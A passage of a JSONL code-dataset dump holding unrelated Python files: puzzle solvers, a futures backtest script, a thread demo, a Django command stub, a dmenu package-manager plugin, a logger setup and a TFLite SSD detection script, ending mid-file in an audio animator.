1\n count[ord(s2[i]) - 97] -= 1\n\n if any(count):\n return False\n\n for i in range(1, n):\n if self.isScramble2(s1[:i], s2[:i]) and self.isScramble2(s1[i:], s2[i:]):\n return True\n if self.isScramble2(s1[:i], s2[n-i:]) and self.isScramble2(s1[i:], s2[:n-i]):\n return True\n\n return False\n\ns1 = \"great\"\ns2 = \"rgeat\" # True\n# s1 = \"abcde\"\n# s2 = \"caebd\" # False\nprint(Solution().isScramble2(s1, s2))\n","sub_path":"87ScrambleStr.py","file_name":"87ScrambleStr.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"250612262","text":"from z3 import *\n\n\ns = Solver()\n\nvalues = [[Int(f's_{x}_{y}') for y in range(9)] for x in range(9)]\n\nproblem = '4.....8.5.3..........7......2.....6.....8.4......1.......6.3.7.5..2.....1.4......'\n\nassert (len(problem) == 81)\n\nfor y in range(9):\n for x in range(9):\n\n # Index out of our problem string\n val = problem[x + 9 * y]\n\n # Constrain range\n if val in '123456789':\n s.add(values[x][y] == int(val))\n\n else:\n s.add(And(values[x][y] <= 9, values[x][y] >= 1))\n\n# Rows must have unique values\nfor row in range(9):\n s.add(Distinct(\n [values[col][row] for col in range(9)]\n ))\n\n# Same with columns\nfor col in range(9):\n s.add(Distinct(\n [values[col][row] for row in range(9)]\n ))\n\n# Constrain boxes\n# x, y are the upper left corner of each box\n# and we then add every pair of (0, 1, 2) to them\n# to get the full box\nfor x in range(0, 9, 3):\n for y in range(0, 9, 3):\n s.add(Distinct(\n [values[x + i][y + j] for i in range(3) for j in range(3)]\n ))\n\nsolutions = 0\n\nwhile s.check() == sat:\n\n # Pretty print solution\n for y in range(9):\n for x in range(9):\n\n print('%s ' % s.model()[values[x][y]], end='')\n\n # Vertical box seperatators!\n if x in [2, 5]:\n print('| ', end='')\n\n print()\n if y in [2, 5]:\n print('------+-------+------')\n\n print()\n\n s.add(Or([values[x][y] != s.model()[values[x][y]] for x in range(9) for y in range(9)]))\n\n solutions += 1\n\nif (solutions > 0):\n print('Found %s solutions!' % solutions)\n\nelse:\n print('Found no solutions!')\n","sub_path":"sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"398428614","text":"import CrazyCod.Utilities.cartrules as crtr\nimport CrazyCod.Utilities.filters3 as filt\n\nimport CrazyCod.Futures.Collect.OldWork.step4_get_returns as s4gr\nimport CrazyCod.Utilities.Old_Work.drawchart2 as drch2\nfrom CrazyCod.Futures.folder import *\nfrom CrazyCod.Utilities.pkgstdy import *\n\nUnCorrUniv = [s4gr._f1_SP500, s4gr._f01_CrudeWTI, s4gr._f01_Wheat, s4gr._f01_Gold, s4gr._f01_Copper, s4gr._f1_USLBond,\n s4gr._f01_LCattle, s4gr._f01_LeanHogs, s4gr._f01_Sugar, s4gr._f01_Cocoa, s4gr._f01_Coffee, s4gr._f01_Milk,\n s4gr._f01_Cotton, s4gr._f01_FCOJ, s4gr._f01_RoughRice, s4gr._f01_Lumber, s4gr._f01_CoalRot,\n s4gr._f1_IndRupee, s4gr._f01_DryMilk, s4gr._f01_Butter, s4gr._f01_NatGas]\n\n\ndef _return_bands(lr1a, trm):\n trm1 = (2*trm+1)/3\n trm2 = (3*trm-1)/2\n x = np.log(lr1a)\n trs = filt.ema(x, trm)\n trw = filt.ema(x, trm1)\n trg = filt.ema(x, trm2)\n trcov = 3*((trm+1)/(trm-1))*np.power(trw-trs, 2)\n trcov1 = 3*((trm2+1)/(trm2-1))*np.power(trs-trg, 2)\n terr = np.sqrt(filt.ema(np.power(x, 2), trm)-np.power(trs, 2)-trcov)\n terr1 = np.sqrt(filt.ema(np.power(x, 2), trm2)-np.power(trg, 2)-trcov1)\n terr2 = np.exp(3*np.log(terr)-2*np.log(terr1))\n return terr2\n\ni = 9\nfig_data = mkt_retrieve(UnCorrUniv[i].crname, 'Stats', 'Returns')[['Date', 'Open', 'High', 'Low', 'Close']]\n\nfig_data['Lrma20'] = filt.smth_price0(fig_data['Open'].values, fig_data['Close'].values, 17, 17, 32, 37, 19) # f2\n_tmp = filt.smth_price0_ohlc(np.ascontiguousarray(fig_data[['Open', 'High', 'Low', 'Close']].values), 17, 17, 32, 37, 19)\n_tmp_ss = filt.smth_price0(np.ascontiguousarray(_tmp[:, 0]), np.ascontiguousarray(_tmp[:, 3]), 3, 3, 6, 24, 16)\n\n# this one hugs too much\nfig_data['LrmaNew'] = filt.smth_price0(fig_data['Open'].values, fig_data['Close'].values, 26, 35, 50, 61, 35)\n\n# fig_data['Lrma20g'] = np.sign(filt.chg(fig_data['Lrma20'].values))\nfig_data['Lrma20g'] = np.sign(filt.chg(_tmp_ss)) # _stmp_sig\n\nfig_data['Lrma20_256'] = filt.lrma(fig_data['Lrma20'].values, 256, lg=True) # s4\n_ltmp = filt.lrma_ohlc(_tmp, 256, lg=True)\n_lerr = _return_bands(_ltmp[:, 3], 128) # e0\n\n#### - use t0\nfig_data['Lrma20_256e'] = filt.ema(fig_data['Lrma20_256'].values, 50)\nfig_data['Lrma20_256g'] = np.sign(_ltmp[:, 3] - fig_data['Lrma20_256e'].values) # t0\n\n#### - use t2\n# _ltmp_ss = filt.smth_price0_ohlc(_ltmp, 3, 3, 27, 30, 3)\n# fig_data['Lrma20_256g'] = np.sign(filt.chg(np.ascontiguousarray(_ltmp_ss[:, 3]))) # t2\n\n# _trlrma20_256_err = _return_bands(fig_data['Lrma20_256'].values, 256)\n\nfig_data['Lrma20_256_u'] = np.exp(np.log(fig_data['Lrma20_256'].values) + _lerr * 3) # b3\nfig_data['Lrma20_256_d'] = np.exp(np.log(fig_data['Lrma20_256'].values) - _lerr * 3)\n\nfig_data['Combo_g'] = crtr.cart1(fig_data['Lrma20'].values, fig_data['Lrma20g'].values,\n fig_data['Lrma20_256g'].values, fig_data['Lrma20_256_u'].values,\n fig_data['Lrma20_256_d'].values)\n\n# _test = filt.smth_price0_ohlc(np.ascontiguousarray(fig_data[['Open', 'High', 'Low', 'Close']].values),\n# 13, 15, 25, 30, 9)\n# fig_data['SmthOpen'] = _test[:, 0]\n# fig_data['SmthHigh'] = _test[:, 1]\n# fig_data['SmthLow'] = _test[:, 2]\n# fig_data['SmthClose'] = _test[:, 3]\n#\n# fig_data['DLrma2020'] = filt.smth_price0(fig_data['SmthOpen'].values, fig_data['SmthClose'].values, 3, 3, 11, 36, 3)\n# fig_data['DLrma2020g'] = np.sign(filt.chg(fig_data['DLrma2020'].values))\n#\n# fig_data['DLrma2006'] = filt.smth_price0(fig_data['SmthOpen'].values, fig_data['SmthClose'].values, 3, 3, 6, 24, 16)\n# fig_data['DLrma2006g'] = np.sign(filt.chg(fig_data['DLrma2006'].values))\n\n# do a new smooth filter parameter search, which maximizes reduction of changes, while minimizing distance\n# currently the overshoot is very high when applied to Lrma20\n\n# calculate the returns (convert this to Cython code)\n_ny = filt.fst_nan(fig_data['Combo_g'].values)+1\n_n = fig_data.shape[0]\nfor i in ['StratOpen', 'StratHigh', 'StratLow', 'StratClose']:\n fig_data[i] = np.nan\nfor i in range(_ny, _n):\n if i == _ny:\n fig_data[i, 'StratOpen'] = 100 * (1 + (fig_data[i, 'Open'] / fig_data[i - 1, 'Close'] - 1) *\n fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratHigh'] = 100 * (1 + (fig_data[i, 'High'] / fig_data[i - 1, 'Close'] - 1) *\n fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratLow'] = 100 * (1 + (fig_data[i, 'Low'] / fig_data[i - 1, 'Close'] - 1) *\n fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratClose'] = 100 * (1 + (fig_data[i, 'Close'] / fig_data[i - 1, 'Close'] - 1) *\n fig_data[i - 1, 'Combo_g'])\n else:\n fig_data[i, 'StratOpen'] = fig_data[i-1, 'StratClose'] * (1 + (\n fig_data[i, 'Open'] / fig_data[i - 1, 'Close'] - 1) * fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratHigh'] = fig_data[i-1, 'StratClose'] * (1 + (\n fig_data[i, 'High'] / fig_data[i - 1, 'Close'] - 1) * fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratLow'] = fig_data[i-1, 'StratClose'] * (1 + (\n fig_data[i, 'Low'] / fig_data[i - 1, 'Close'] - 1) * fig_data[i - 1, 'Combo_g'])\n fig_data[i, 'StratClose'] = fig_data[i-1, 'StratClose'] * (1 + (\n fig_data[i, 'Close'] / fig_data[i - 1, 'Close'] - 1) * fig_data[i - 1, 'Combo_g'])\n\n# fig_info = [{'Chart': 'Bar', 'Lines': ['Lrma20', 'Lrma20_256', 'Lrma20_256e', 'Lrma20_256_u', 'Lrma20_256_d',\n# 'LrmaNew']}, #\n# {'Lines': ['Lrma20g']}, {'Lines': ['Lrma20_256g']}, {'Lines': ['Combo_g']},\n# {'Chart': 'Bar', 'ChartDataCols': ['StratOpen', 'StratHigh', 'StratLow', 'StratClose']}]\n\n# fig_info = [{'Chart': 'Bar', 'Lines': ['Lrma20', 'Lrma20_256', 'Lrma20_256_u', 'Lrma20_256_d']},\n# {'Lines': ['Lrma20g']},\n# {'Chart': 'Bar', 'ChartDataCols': ['SmthOpen', 'SmthHigh', 'SmthLow', 'SmthClose'],\n# 'Lines': ['DLrma2020', 'DLrma2006']}, {'Lines': ['DLrma2020g']}, {'Lines': ['DLrma2006g']}]\n\nfig_info = [{'Chart': 'Bar', 'Lines': ['Lrma20', 'Lrma20_256', 'Lrma20_256e', 'LrmaNew']},{'Lines': ['Lrma20_256g']}] #\n\n\ndrch2.draw_chart(fig_info, fig_data, years=20)\n\n# couple of problems: slow lrma might get delayed\n# ema of 25 can make it whipsaw\n# problem time-periods:\n# Sep-1998: lrma is too delayed\n# 2000: lrma vs ema of lrma gets whipsawed\n# post-Jul-2000: switching to st-trend doesn't work\n# 2006: trend goes back up, but lrma takes a while to turn around\n# Nov-2008: st-trend gets whipsawed a lot\n# never gives a st_trend on the above, always on the bottom\n\n# give a small band around ema to avoid it from being whipsawed\n\n# Need to fix LRMA, and its trend\n# faster Trend can be fixed and made smooth by using 2-day, 3-day etc\n\n# need to measure # of chgs for a super fast signal, and use that to decide\n# if we want to use it as a multiplier\n\n# need to fix bands","sub_path":"CrazyCod/Futures/Models/SwitchingOld/Old_Work/test_switching_algo.py","file_name":"test_switching_algo.py","file_ext":"py","file_size_in_byte":7075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"496266745","text":"from Queue import Queue\nfrom threading import Thread, current_thread\nimport time\n\nnum = 5\nq = Queue()\ndata = list(range(30))\n\ndef worker():\n while True:\n number = q.get()\n print (\"{} -> Number: {} \".format(current_thread().name, number))\n time.sleep(0.1)\n q.task_done()\n\nfor i in range(num):\n t = Thread(name=\"Thread {}\".format(i), target=worker)\n t.daemon = True\n t.start()\n\ndef add():\n for i in range(num):\n time.sleep(0.5)\n q.put(i)\n\nadd()\nq.join()\n","sub_path":"python/queue_thread.py","file_name":"queue_thread.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41140540","text":"from django.core.management.base import BaseCommand, CommandError, LabelCommand, copy_helper\n\nimport os\n\nfrom django.utils.importlib import import_module\n\nclass Command(LabelCommand):\n help = \"Creates scaffold for basic CRUD for the given model in the given app name in this project's directory.\"\n args = \"[modelname,appname]\"\n label = 'model name'\n\n requires_model_validation = False\n # Can't import settings during this command, because they haven't\n # necessarily been created.\n can_import_settings = False\n\n def handle_label(self, model_name, app_name, directory=None, **options):\n if directory is None:\n directory = os.getcwd()\n\n # Determine the project_name by using the basename of directory,\n # which should be the full path of the project directory (or the\n # current directory if no directory was passed).\n project_name = os.path.basename(directory)\n\n # Check that the app_name exists.\n try:\n import_module(app_name)\n except ImportError:\n raise CommandError(\"%r does not appear to be an app in this project. Did you spell it correctly?\" % app_name)\n\n # Check that the model_name exists\n #try:\n \n import_module(app_name)\n fields = app_name.model_name._meta.fields\n\nclass ProjectCommand(Command):\n help = (\"Creates scaffold for basic CRUD for the given model in the given app name in this project's directory.\")\n\n def __init__(self, project_directory):\n super(ProjectCommand, self).__init__()\n self.project_directory = project_directory\n\n def handle_label(self, app_name, model_name, **options):\n super(ProjectCommand, self).handle_label(app_name, model_name, self.project_directory, **options)\n","sub_path":"mysite/scaffolder/management/commands/scaffold.py","file_name":"scaffold.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"131611876","text":"# -*- coding: utf8 -*-\nimport dmenu_extended\nimport os\n\n\nclass extension(dmenu_extended.dmenu):\n\n title = 'System package management'\n is_submenu = True\n detected_packageManager = False\n\n def __init__(self):\n self.load_preferences()\n self.cache_packages = dmenu_extended.path_cache + '/packages.txt'\n\n # Determine package manager\n if os.path.exists('/usr/bin/apt-get'):\n # We are Debian based\n self.command_installPackage = 'sudo apt-get install '\n self.command_removePackage = 'sudo apt-get remove '\n self.command_listInstalled = ['dpkg', '-l']\n self.command_listAvailable = ['apt-cache', 'search', '']\n self.command_systemUpdate = 'sudo apt-get update && sudo apt-get upgrade'\n self.detected_packageManager = 'apt-get'\n elif os.path.exists('/usr/bin/yum'):\n # We are Red Hat based\n self.command_installPackage = 'sudo yum install '\n self.command_removePackage = 'sudo yum remove '\n self.command_listInstalled = 'yum list installed'\n self.command_listAvailable = [\"yum\", \"search\", \"\"]\n self.command_systemUpdate = 'sudo yum update'\n self.detected_packageManager = 'yum'\n elif os.path.exists('/usr/bin/dnf'):\n self.command_installPackage = 'sudo dnf install '\n self.command_removePackage = 'sudo dnf remove '\n self.command_listInstalled = 'dnf list installed'\n self.command_listAvailable = [\"dnf\", \"search\", \"\"]\n self.command_systemUpdate = 'sudo dnf update'\n self.detected_packageManager = 'dnf'\n elif os.path.exists('/usr/bin/pacman'):\n # We are Arch based\n self.command_installPackage = 'sudo pacman -S '\n self.command_removePackage = 'sudo pacman -R '\n self.command_listInstalled = 'pacman -Q'\n self.command_listAvailable = 'pacman -Ss'\n self.command_systemUpdate = 'sudo pacman -Syu'\n self.detected_packageManager = 'pacman'\n elif os.path.exists('/usr/bin/emerge'):\n # We are Gentoo based\n self.command_installPackage = 'sudo emerge '\n self.command_removePackage = 'sudo emerge --unmerge '\n self.command_listInstalled = 'cd /var/db/pkg/ && ls -d */* | sed \\'s/\\-[0-9].*$//\\' > ' + dmenu_extended.path_cache + '/tmp.txt'\n self.command_listAvailable = 'emerge --search \"\" | grep \"* \" | cut -c 4- | sed \"s/\\[ Masked \\]//g\" | sed -n \\'/^app-accessibility/,$p\\' > ' + dmenu_extended.path_cache + '/tmp.txt'\n self.command_systemUpdate = 'sudo emerge --sync && sudo emerge -uDv @world'\n self.detected_packageManager = 'portage'\n\n def install_package(self):\n packages = self.cache_open(self.cache_packages)\n\n if packages == False:\n self.menu('No package database exists. Press enter to build cache')\n self.build_package_cache()\n packages = self.cache_open(self.cache_packages)\n\n package = self.menu(packages, prompt=\"Install:\")\n\n if len(package) > 0:\n self.open_terminal(self.command_installPackage + package.split(' ')[0], True)\n self.rebuild_notice()\n\n def remove_package(self):\n self.message_open('Collecting list of installed packages')\n if self.detected_packageManager == 'apt-get':\n packages = self.installedPackages_aptget()\n elif self.detected_packageManager == 'yum':\n packages = self.installedPackages_yum()\n elif self.detected_packageManager == 'dnf':\n packages = self.installedPackages_dnf()\n elif self.detected_packageManager == 'pacman':\n packages = self.installedPackages_pacman()\n elif self.detected_packageManager == 'portage':\n packages = self.u_installedPackages_portage()\n\n self.message_close()\n\n package = self.select(packages, prompt=\"Uninstall:\")\n if package is not -1:\n self.open_terminal(self.command_removePackage + package, True)\n self.rebuild_notice()\n\n def update_package(self):\n self.message_open('Collecting list of installed packages')\n\n if self.detected_packageManager == 'apt-get':\n packages = self.installedPackages_aptget()\n elif self.detected_packageManager == 'yum':\n packages = self.installedPackages_yum()\n elif self.detected_packageManager == 'dnf':\n packages = self.installedPackages_dnf()\n elif self.detected_packageManager == 'pacman':\n packages = self.installedPackages_pacman()\n elif self.detected_packageManager == 'portage':\n packages = self.installedPackages_portage()\n\n self.message_close()\n\n package = self.select(packages, prompt=\"Update:\")\n if package is not -1:\n self.open_terminal(self.command_installPackage + package, True)\n\n def build_package_cache(self, message=True):\n if message:\n self.message_open('Building package cache')\n\n if self.detected_packageManager == 'apt-get':\n packages = self.availablePackages_aptget()\n elif self.detected_packageManager == 'yum':\n packages = self.availablePackages_yum()\n elif self.detected_packageManager == 'dnf':\n packages = self.availablePackages_dnf()\n elif self.detected_packageManager == 'pacman':\n packages = self.availablePackages_pacman()\n elif self.detected_packageManager == 'portage':\n packages = self.availablePackages_portage()\n\n self.cache_save(packages, self.cache_packages)\n if message:\n self.message_close()\n self.menu(\"Package cache built\")\n\n def update_system(self):\n self.open_terminal(self.command_systemUpdate, True)\n\n def installedPackages_aptget(self):\n packages = self.command_output(self.command_listInstalled)\n out = []\n for package in packages:\n tmp = package.split()\n if len(tmp) > 6:\n out.append(tmp[1])\n out.sort()\n return list(set(out))\n\n def installedPackages_yum(self):\n packages = self.command_output(self.command_listInstalled)\n packages.sort()\n return list(set(packages))\n \n def installedPackages_dnf(self):\n packages = self.command_output(self.command_listInstalled)\n packages.sort()\n return list(set(packages))\n\n def installedPackages_pacman(self):\n packages = self.command_output(self.command_listInstalled)\n out = []\n for package in packages:\n if len(package) > 0 and package[0] != \" \":\n out.append(package.split(' ')[0])\n out.sort()\n return list(set(out))\n\n def installedPackages_portage(self):\n os.system(self.command_listInstalled)\n packages = self.command_output('cat ' + dmenu_extended.path_cache + '/tmp.txt')\n os.system('rm ' + dmenu_extended.path_cache + '/tmp.txt')\n return packages\n\n def u_installedPackages_portage(self):\n os.system('cd /var/db/pkg/ && ls -d */* > ' + dmenu_extended.path_cache + '/tmp.txt')\n packages = self.command_output('cat ' + dmenu_extended.path_cache + '/tmp.txt')\n os.system('rm ' + dmenu_extended.path_cache + '/tmp.txt')\n return packages\n\n def availablePackages_aptget(self):\n packages = self.command_output(self.command_listAvailable)\n packages.sort()\n return packages\n\n def availablePackages_yum(self):\n packages = self.command_output(self.command_listAvailable)\n out = []\n last = \"\"\n for package in packages:\n tmp = package.split( ' : ' )\n if len(tmp) > 1:\n if tmp[0][0] == \" \":\n last += \" \" + tmp[1]\n else:\n out.append(last)\n last = tmp[0].split('.')[0] + ' - ' + tmp[1]\n\n out.append(last)\n out.sort()\n return list(set(out[1:]))\n \n def availablePackages_dnf(self):\n packages = self.command_output(self.command_listAvailable)\n out = []\n last = \"\"\n for package in packages:\n tmp = package.split( ' : ' )\n if len(tmp) > 1:\n if tmp[0][0] == \" \":\n last += \" \" + tmp[1]\n else:\n out.append(last)\n last = tmp[0].split('.')[0] + ' - ' + tmp[1]\n\n out.append(last)\n out.sort()\n return list(set(out[1:]))\n\n def availablePackages_pacman(self):\n packages = self.command_output(self.command_listAvailable)\n out = []\n last = \"\"\n for package in packages:\n if package != \"\":\n if package[0:3] == \" \":\n last += \" - \" + package[4:]\n else:\n out.append(last)\n last = package\n out.append(last)\n out.sort()\n return list(set(out[1:]))\n\n def availablePackages_portage(self):\n os.system(self.command_listAvailable)\n packages = self.command_output('cat ' + dmenu_extended.path_cache + '/tmp.txt')\n os.system('rm ' + dmenu_extended.path_cache + '/tmp*')\n return packages\n\n def rebuild_notice(self):\n # gnome-termainal forks from the calling process so this message shows\n # before the action has completed.\n if self.prefs['terminal'] != 'gnome-terminal':\n rebuild = self.menu([\"Cache may be out-of-date, rebuild at your convenience.\", \"* Rebuild cache now\"])\n if rebuild == \"* Rebuild cache now\":\n self.cache_regenerate()\n\n def run(self, inputText):\n\n if self.detected_packageManager == False:\n self.menu([\"Your system package manager could not be determined\"])\n self.sys.exit()\n else:\n print('Detected system package manager as ' + str(self.detected_packageManager))\n\n items = [self.prefs['indicator_submenu'] + ' Install a new package',\n self.prefs['indicator_submenu'] + ' Uninstall a package',\n self.prefs['indicator_submenu'] + ' Update a package',\n 'Rebuild the package cache',\n 'Perform system upgrade']\n\n selectedIndex = self.select(items, prompt='Action:', numeric=True)\n\n if selectedIndex != -1:\n if selectedIndex == 0:\n self.install_package()\n elif selectedIndex == 1:\n self.remove_package()\n elif selectedIndex == 2:\n self.update_package()\n elif selectedIndex == 3:\n self.build_package_cache()\n elif selectedIndex == 4:\n self.update_system()\n","sub_path":"plugin_systemPackageManager.py","file_name":"plugin_systemPackageManager.py","file_ext":"py","file_size_in_byte":10874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"379418149","text":"#from config import *\nimport logging\nimport datetime\nimport subprocess\nimport os\n\n#Make Log File\nsubprocess.call(\"mkdir -p logs\", shell = True)\n\n#Get Date for Filenames\nnow = datetime.datetime.now()\ndate = now.strftime(\"%Y-%m-%d\")\n\n#Bash Commands\n#commit == git rev-parse HEAD\n#branch == git rev-parse --abbrev-ref HEAD\ncommit = str(subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"]).strip()).replace(\"b'\", \"\").replace(\"'\", \"\")[0:7]\nbranch = str(subprocess.check_output([\"git\", \"rev-parse\", \"--abbrev-ref\", \"HEAD\"]).strip()).replace(\"b'\", \"\").replace(\"'\", \"\")\next = \"log\"\n\n#Logfilename\nlogfilename = \"logs/OpenFEC_report_{}_{}_{}.{}\".format(date, branch, commit, ext)\n\n#Set Logger\nlogging.basicConfig(level=logging.INFO, format='%(message)s')\nlogger = logging.getLogger()\nlogger.addHandler(logging.FileHandler(logfilename, 'a'))\nprint = logger.info\n\n","sub_path":"fec_download/_util/setlogger.py","file_name":"setlogger.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"325098561","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 11 08:54:47 2020\n\n@author: essys\n\"\"\"\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\nimport cv2\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport pathlib\nimport matplotlib.pyplot as plt\nfrom box_utils import decode, compute_nms\nimport yaml\nfrom anchor import generate_default_boxes, get_anchors, get_default_params\nfrom scipy.special import softmax\n\n\n\ntflite_model_file = \"./ssd.quant.tflite\"\n\ninterpreter = tf.lite.Interpreter(model_path=str(tflite_model_file))\ninterpreter.allocate_tensors()\n\n\ninput_index = interpreter.get_input_details()[0][\"index\"]\np_conf_index = interpreter.get_output_details()[0][\"index\"]\np_boxes_index = interpreter.get_output_details()[1][\"index\"]\n\n\n\nimg = cv2.imread(\"/home/essys/Pictures/picture.jpeg\", -1)\n\nimg = cv2.resize(img, (300,300))\ninput_details = interpreter.get_input_details()[0]\n\ninput_scale, input_zero_point = input_details[\"quantization\"]\ntest_image = img/127.0 -1.0\ntest_image = test_image / input_scale + input_zero_point\n \ntest_image = np.expand_dims(img, axis=0).astype(input_details[\"dtype\"]) \ninterpreter.set_tensor(input_index, test_image)\ninterpreter.invoke()\n\n\np_conf = interpreter.get_tensor(p_conf_index)\np_boxes = interpreter.get_tensor(p_boxes_index)\n# apply scaling dequantization\n# real value = (int8val - zeropoint) x scale\np_conf = (p_conf - np.float32(interpreter.get_output_details()[0]['quantization'][1])) * np.float32(interpreter.get_output_details()[0]['quantization'][0])\np_boxes = (p_boxes - np.float32(interpreter.get_output_details()[1]['quantization'][1])) *np.float32( interpreter.get_output_details()[1]['quantization'][0])\n\nwith open('./config.yml') as f:\n cfg = yaml.load(f)\n\ntry:\n config = cfg['SSD300']#[args.arch.upper()]\nexcept AttributeError:\n raise ValueError('Unknown architecture:') \ndefault_boxes = generate_default_boxes(config)\nnewres = decode(default_boxes, p_boxes[0]).numpy()\nconf = softmax(p_conf, -1)[0]\nclasses = np.argmax(conf, -1)\n\n# sort ant filter to threshold > 0.5, top 400 dets\ndef det_sort_filt(boxes, conf, classes, topn =100, threshold=0.5):\n # one class\n conf = conf[:, 1:]\n scores = np.squeeze(conf)\n \n #filter 1 classes\n mask1 = classes == 1\n mask2 = scores >= threshold\n mask = np.logical_and(mask1, mask2)\n boxes = boxes[mask]\n scores = scores[mask]\n classes = classes[mask]\n # scores = np.max(conf, -1)\n # print(scores, conf)\n # sort\n idxes = np.argsort(-scores)\n idxes = idxes[:topn]\n # print(idxes)\n # conf =conf[idxes]\n classes =classes[idxes]\n scores =scores[idxes]\n boxes =boxes[idxes]\n \n \n return classes, scores, boxes\nclasses, scores, boxes = det_sort_filt(newres, conf, classes)\n# now apply nms\ndef bboxes_nms(classes, scores, bboxes, nms_threshold=0.45):\n \"\"\"Apply non-maximum selection to bounding boxes.\n \"\"\"\n keep_bboxes = np.ones(scores.shape, dtype=np.bool)\n for i in range(scores.size-1):\n if keep_bboxes[i]:\n # Computer overlap with bboxes which are following.\n overlap = bboxes_jaccard(bboxes[i], bboxes[(i+1):])\n # Overlap threshold for keeping + checking part of the same class\n keep_overlap = np.logical_or(overlap < nms_threshold, classes[(i+1):] != classes[i])\n keep_bboxes[(i+1):] = np.logical_and(keep_bboxes[(i+1):], keep_overlap)\n\n idxes = np.where(keep_bboxes)\n return classes[idxes], scores[idxes], bboxes[idxes]\n\n\ndef bboxes_jaccard(bboxes1, bboxes2):\n \"\"\"Computing jaccard index between bboxes1 and bboxes2.\n Note: bboxes1 and bboxes2 can be multi-dimensional, but should broacastable.\n \"\"\"\n bboxes1 = np.transpose(bboxes1)\n bboxes2 = np.transpose(bboxes2)\n # Intersection bbox and volume.\n int_ymin = np.maximum(bboxes1[0], bboxes2[0])\n int_xmin = np.maximum(bboxes1[1], bboxes2[1])\n int_ymax = np.minimum(bboxes1[2], bboxes2[2])\n int_xmax = np.minimum(bboxes1[3], bboxes2[3])\n\n int_h = np.maximum(int_ymax - int_ymin, 0.)\n int_w = np.maximum(int_xmax - int_xmin, 0.)\n int_vol = int_h * int_w\n # Union volume.\n vol1 = (bboxes1[2] - bboxes1[0]) * (bboxes1[3] - bboxes1[1])\n vol2 = (bboxes2[2] - bboxes2[0]) * (bboxes2[3] - bboxes2[1])\n jaccard = int_vol / (vol1 + vol2 - int_vol)\n return jaccard\n\nclasses, scores, boxes = bboxes_nms(classes, scores, boxes, nms_threshold=0.45)\n\n# classes, scores, boxes = ssd_bboxes_select_layer(classes, boxes, scores)\n\n\nimg = cv2.imread(\"/home/essys/Pictures/picture.jpeg\", -1)\n\nimg = cv2.resize(img, (300,300))\n\ndef draw_image(img, bboxes, classes, mode = 'gt'):\n h,w,c = np.shape(img)\n for i in range(len(bboxes)):\n bbox = bboxes[i]\n x1,y1, x2,y2 = bbox \n # x1,y1, x2,y2 = x1, y1-y2/2,x1 + x2/2,y1 + y2/2\n x1,y1,x2,y2 = int(x1 * w), int(y1 * h), int(x2 * w), int(y2 * h)\n print(x1, x2, y1, y2, mode)\n cv2.rectangle(img, (x1, y1), (x2, y2), (255,0,0), 2) \n cv2.rectangle(img, (x1, y1), (x1+10, y1+15), (0,0,0), -1) \n if(type(classes[i]) in [np.int64, np.int32, np.int8, int]): \n cv2.putText(img,str(classes[i]), (x1,y1+10),1, 1.0, (255,255,255))\n else:\n cv2.putText(img,str(classes[i].numpy()), (x1,y1+10),1, 1.0, (255,255,255)) \n\n# NUM_CLASSES = 2\n# newres = decode(default_boxes, newres).numpy()\n\n# confs = tf.math.softmax(p_conf[0], axis=-1)\n# classes = tf.math.argmax(confs, axis=-1)\n# scores = tf.math.reduce_max(confs, axis=-1)\n \n# out_boxes = []\n# out_labels = []\n# out_scores = []\n# # print(confs.shape,classes.shape, scores.shape, boxes.shape)\n# for c in range(1, NUM_CLASSES):\n# cls_scores = confs[:, c]\n\n# score_idx = cls_scores > 0.8\n# # cls_boxes = tf.boolean_mask(boxes, score_idx)\n# # cls_scores = tf.boolean_mask(cls_scores, score_idx)\n# cls_boxes = newres[score_idx]\n# cls_scores = cls_scores[score_idx]\n\n# nms_idx = compute_nms(cls_boxes, cls_scores, 0.35, 200)\n# cls_boxes = tf.gather(cls_boxes, nms_idx)\n# cls_scores = tf.gather(cls_scores, nms_idx)\n# cls_labels = [c] * cls_boxes.shape[0]\n\n# out_boxes.append(cls_boxes)\n# out_labels.extend(cls_labels)\n# out_scores.append(cls_scores)\n\n# out_boxes = tf.concat(out_boxes, axis=0)\n# out_scores = tf.concat(out_scores, axis=0)\n\n# boxes = tf.clip_by_value(out_boxes, 0.0, 1.0).numpy()\n# classes = np.array(out_labels)\n# scores = out_scores.numpy()\n\ndraw_image(img, boxes, classes)\nplt.imshow(img)\nplt.show()","sub_path":"quant_show.py","file_name":"quant_show.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"331025089","text":"import noise\nimport pyaudio\nimport struct\nimport math\nimport time\nimport sys\n\n# At the rate we are going, this is exactly one seconds worth of data.\nSAMPLE_RATE = 44100\n\nSAMPLE_SIZE = 4\nFRAME_SIZE = SAMPLE_SIZE\n\n# Frequency in hertz\nSTART_FREQUENCY = 220\n\n# Hz / second\nANIM_RATE = 1\n\nclass FreqConst:\n def __init__(self):\n pass\n def is_done(self):\n return False\n def next(self, dt, old_val):\n return old_val\n\nclass FreqAnimator:\n\n INIT_STATE = 'init'\n RUNNING_STATE = ''\n DONE_STATE = 'done'\n\n def __init__(self, rate, *states):\n self.states = list(states)\n # Amount of time in seconds to add a 